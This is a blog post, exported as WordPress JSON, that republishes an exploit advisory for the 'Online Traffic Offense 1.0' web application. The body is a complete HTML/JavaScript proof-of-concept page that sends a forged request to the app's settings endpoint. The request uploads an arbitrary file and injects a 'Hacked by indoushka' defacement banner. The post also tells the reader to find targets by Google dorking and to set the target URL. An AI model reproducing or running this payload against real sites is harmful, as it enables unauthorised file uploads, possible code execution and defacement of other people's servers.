{"id":59797,"date":"2024-09-18T21:10:33","date_gmt":"2024-09-18T18:10:33","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181613\/oto10-xsrfupload.txt"},"modified":"2024-09-18T21:10:33","modified_gmt":"2024-09-18T18:10:33","slug":"online-traffic-offense-1-0-csrf-arbitrary-file-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-traffic-offense-1-0-csrf-arbitrary-file-upload\/","title":{"rendered":"Online Traffic Offense 1.0 CSRF \/ Arbitrary File Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Online Traffic Offense 1.0 Auth by Pass Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/traffic_offense_1.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n<p>[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n<p>[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.<\/p>\n<p>[+] Line 33 : Set your target url<\/p>\n<p>[+] save payload as poc.html <\/p>\n<p>[+] payload : <\/p>\n<p>&lt;!DOCTYPE html&gt;<br \/>&lt;html lang=&#8221;en&#8221;&gt;<br \/>&lt;head&gt;<br \/>&lt;meta charset=&#8221;UTF-8&#8243;&gt;<br \/>&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width, initial-scale=1.0&#8243;&gt;<br \/>&lt;title&gt;Direct File Upload&lt;\/title&gt;<br \/>&lt;\/head&gt;<br \/>&lt;body&gt;<\/p>\n<p>&lt;h2&gt;Direct File Upload&lt;\/h2&gt;<br \/>&lt;form id=&#8221;uploadForm&#8221;&gt;<br \/>&lt;label for=&#8221;fileInput&#8221;&gt;Select File:&lt;\/label&gt;<br \/>&lt;input type=&#8221;file&#8221; id=&#8221;fileInput&#8221; name=&#8221;fileInput&#8221; required&gt;&lt;br&gt;&lt;br&gt;<\/p>\n<p>&lt;button type=&#8221;button&#8221; onclick=&#8221;uploadFile()&#8221;&gt;Upload File&lt;\/button&gt;<br \/>&lt;\/form&gt;<\/p>\n<p>&lt;script&gt;<br \/>function uploadFile() {<br \/>const fileInput = document.getElementById(&#8216;fileInput&#8217;).files[0];<\/p>\n<p>if (!fileInput) {<br \/>alert(&#8216;Please select a file.&#8217;);<br \/>return;<br \/>}<\/p>\n<p>const formData = new FormData();<br \/>formData.append(&#8216;name&#8217;, &#8216;&lt;marquee&gt;&lt;font color=lime size=32&gt;Hacked by indoushka&lt;\/font&gt;&lt;\/marquee&gt;&#8217;);<br \/>formData.append(&#8216;img&#8217;, fileInput);<\/p>\n<p>console.log(&#8220;(+) Uploading file&#8230;&#8221;);<\/p>\n<p>fetch(&#8216;http:\/\/127.0.0.1\/traffic_offense\/classes\/SystemSettings.php?f=update_settings&#8217;, { \/\/ Replace with your upload URL<br \/>method: &#8216;POST&#8217;,<br \/>body: formData<br \/>})<br \/>.then(response =&gt; response.text())<br \/>.then(data =&gt; {<br \/>if (data === &#8216;1&#8217;) {<br \/>console.log(&#8220;(+) File upload seems to have been successful!&#8221;);<br \/>} else {<br \/>console.log(&#8220;(-) Oh no, the file upload seems to have failed!&#8221;);<br \/>}<br \/>})<br \/>.catch(error =&gt; console.error(&#8220;(-) Error during file upload:&#8221;, error));<br \/>}<br \/>&lt;\/script&gt;<\/p>\n<p>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Online Traffic Offense 1.0 Auth by Pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/traffic_offense_1.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This HTML page is designed [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59797","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59797"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59797\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59797"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}